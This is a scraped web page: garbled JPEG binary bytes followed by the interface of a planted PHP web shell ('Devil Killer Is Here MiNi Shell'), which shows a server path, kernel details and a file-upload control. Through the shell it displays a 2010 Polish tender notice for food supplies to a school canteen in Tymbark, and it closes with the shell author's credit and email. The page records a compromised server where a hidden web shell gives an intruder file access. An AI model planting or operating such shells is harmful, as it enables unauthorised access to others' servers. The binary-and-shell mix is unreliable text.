JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100804/238296-N-2010.html

<p class="kh_header"><b>Tymbark: Żywność do stołówki  Zespołu Szkół im. K.E.N. w Tymbarku</b><br>
<b>Numer ogłoszenia: 238296 - 2010; data zamieszczenia: 04.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. Komisji Edukacji Narodowej w Tymbarku , Tymbark 349, 34-650 Tymbark, woj. małopolskie, tel. 18 3325030, faks 18 3325030.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zstymbark.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka podległa samorządowi terytorialnemu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Żywność do stołówki  Zespołu Szkół im. K.E.N. w Tymbarku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności  do stołówki Zespołu Szkół  im. Komisji Edukacji Narodowej w  Tymbarku.
Dostawy podzielono na  3  zadania: 
- produkty spożywcze(suche , przyprawy , konserwy
- mięso, wyroby wędliniarskie, podroby
- mleko i produkty mleczarskie
Przedmiot zamówienia będzie realizowany sukcesywnie w asortymencie i ilościach wynikających z zapotrzebowań składanych bezpośrednio przez Zamawiającego.
Wykaz rodzaju i  ilości  zamawianych produktów w podziale na zadania:
Produkty spożywcze suche, przyprawy , konserwy:
Angielskie  ziele 20g- 3op
Budyń 41g-60 op
Barszcz biały  0,66g- 50 op
Żurek śląski 0,66g- 100 op
Liść laurowy 10g - 3 op
Bułka tarta - 100 kg
Koncentrat buraczany 230g- op 30
Buraczki tarte 0,9l - 30 op
Chrzan tarty 80g - 20 op
Cukier kryształ  -700 kg
Cukier puder -8 kg
Cukier waniliowy 32g- 10 op
Cynamon 20g - 30 op
Drożdże - 1 kg
Dżem truskawkowy 280g Łowicz  lub równoważny -70 op
Dżem brzoskwiniowy 280g Łowicz lub równoważny- 80 op
Powidło śliwkowe 280g - 30 op
Fasola -80 kg
Groch niełuskany -80 kg
Groszek konserwowy 220g -30op
Grzyby - pieczarka konserwowa 0,9l -120 op
Herbata saga100szt 1 op-12szt - 20 op
Jajo ściółkowe kl I  -8300 szt
Kakao Decomoreno 200g lub równoważne -6 op
Kasza jęczmienna średnia - 80  kg
Kasza manna  -10 kg
Kawa Inka 150g karton - 10 op
Majonez 1l - 100 op
Ketchup z dozownikiem 500g Roleski lub równoważny -240 op
Koncentrat pomidorowy 900g -60 op
Konserwa makrela w pomidorach 170g - op 500
 Szprot w pomidorach 170g - 120 op
 Konserwa mięsna 150g lanchmit -300 op
Tuńczyk w oleju - kawałki 170g -100 op
Kukurydza konserwowa 340g - 10 op
Kminek 20g -10 op
Kwasek cytrynowy 20g - 20 op
Paprykarz szczeciński 330g - 100 op
Majeranek  susz tarty 10g - 10 op
Makaron nitki czaniecki lub równoważny - 100 op
Makaron wstążka , kolano, świder 500g lublin lub równoważny - 500 op
Makaron spagetti 500g lublin lub równoważny - 100 op
Makaron zacierka 250g -60 op
Mąka tortowa typ 450  -180 kg
Mąka kartoflana -10 kg
Miód naturalny 400g  -18 op
Miód naturalny 50g - 187 op
Musztarda stołowa z dozownikiem 500g - 120op
Ocet 0,5l -10 op
Ogórek konserwowy 900g -280 op
Olej rzepakowy 5l - 24 op
Olej słonecznikowy 1l -40 op
Papryka sypka 20g -8 op
Pasztet  Mazowiecki lub równoważny  -200 op
Pasztet podlaski 160g lub równoważny  -300op
Pieprz ziołowy mielony 20g- 10 op
Pieprz naturalny 20g -50 op
Płatki śniadaniowe 500g  -80op
Przyprawa Maggi 1L Knorr lub równoważna - 40 op
Przecier ogórkowy 330g  - 150 op
Przypraw do drobiu w proszku 35g -40 op
 Przypraw z kury w proszku 150g -20 op
 Ryż biały -150 kg
Smalec wieprzowy 200g -200op
 Sól kuchenna - 130 kg
Seler konserwowy 900g - 30 op
 Susz jarzynowy 1000g -80 op
Kucharek 200g -80 op
 Sos bolonez do spagetti 70g Knorr lub równoważny -240 op
Sos do mięs 450g -40 op
Sos paprykowo - ziołowy 9g  - 60 op
 Sałatka szwedzka 900g - 24 op
Sałatka grecka 900g - 24 op
Nutella 450g produkty z czekolady -100 słoików
Czekolada nadziewana  z bakaliami 100g- 190 szt 
Czekolada  mleczna  z truskawką  100g -190 szt
Mięso , wyroby wędliniarskie podroby - rodzaj asortymentu i ilości:
Wołowina - antrykot - 40 kg
 Boczek wędzony - 100 kg
Filet drobiowy -850 kg
 Kiełbasa krakowska sucha -20 kg
Kiełbasa wiejska - 50 kg
Kiełbasa toruńska -240 kg
Kości schabowe- 150 kg
Mięso mielone woł - wp - 50 kg
 Parówka wieprzowa  gruba - 80kg
Parówka drobiowa - 200kg
Pasztet wieprzowy -60 kg
Pasztet z drobiu - 200kg
Porcja rosołowa - 120 kg
Schab bez kości -200 kg
Szynka drobiowa -120 kg
Szynka  wiejska wieprzowa - 30 kg
 Bekon - 30 kg
 Szynka gotowana wieprzowa - 220 kg
Udko drobiowe - 400kg
 Wątróbka  drobiowa - 25 kg
Żeberko wp extra -25 kg
 Skrzydełko drobiowe -5 kg
 Kurczaki  -20 kg
 Łopatka  wieprzowa - 60 kg
 Słonina  -10 kg
Produkty mleczne - rodzaj asortymentu i ilości :
 Kefir 400g - 100 op 
 Margaryna Palma 250g Bielmar lub równoważna- 300 op
 Masło extra 200g zaw tł 82 %- 2000 op
 Mleko 3,2% folia - 680 litrów 
 Ser biały  półtłusty  mielony - 120 kg
Ser biały  tłusty pergamin -200 kg
Ser żółty o zaw tłuszczu 45%- 160 kg
Ser gryficki - 20 kg
Serek homogenizowany 150g - 500 op
Serek  Almette 150 g lub równoważny - 100op
Serek top krążek Hochland lub równoważny - 400 szt
Śmietana 30% 500g - 500 op
Śmietana 18% 500g-50 op
Jogurt kubek 150g- 190 op
 Serek wiejski 200g lub równoważny - 100op
Serek Turek 150g lub równoważny- 100 op.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.89.00.00-0, 15.10.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 122.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak konkretyzacji warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak konkretyzacji warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak konkretyzacji warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak konkretyzacji warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Brak konkretyzacji warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany formularz oferty  zgodnie z załącznikiem nr 1 do SIWZ
2. Wypełniony  i podpisany arkusz kalkulacyjny dla zadania nr 2 a,b,c  w zależności o którą część zamówienia oferent  się ubiega - zgodnie z zał nr 2  do SIWZ
3.oświadczenie o spełnianiu  warunków określonych  w art 22 ust1 ustawy  wg załącznika nr 3 do SIWZ
4. Zaakceptowany  projekt umowy  dla zadania - załącznik nr 4 do SIWZ , przez akceptację   rozumie sie złożenie   podpisu i imiennej pieczątki przez osobę uprawnioną  na ostatniej stronie wzoru umowy. 
5. Aktualny  odpis włąściwego  rejestru  albo aktualne zaświadczenie  o wpisie do działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert. (oryginał lub kopia poświadczona  za zgodność z oryginałem przez oferenta. 
6. Informacja o części zamówienia  którą   oferent zamierza powierzyć   podwykonawcy - jeżeli zaistnieje taka okoliczność</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość zmian postanowień umowy  zgodny  aktem woli obu stron,  pod warunkiem  nie wywołania  niekorzystnych  skutków finansowych lub prawnych  dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zstymbark.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół im. Komisji Edukacji Narodowej  w Tymbarku 
34-650 Tymbark 349.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2010 godzina 10:00, miejsce: Zespół Szkół im. Komisji Edukacji Narodowej  w Tymbarku 
34-650 Tymbark 349
Sekretariat szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com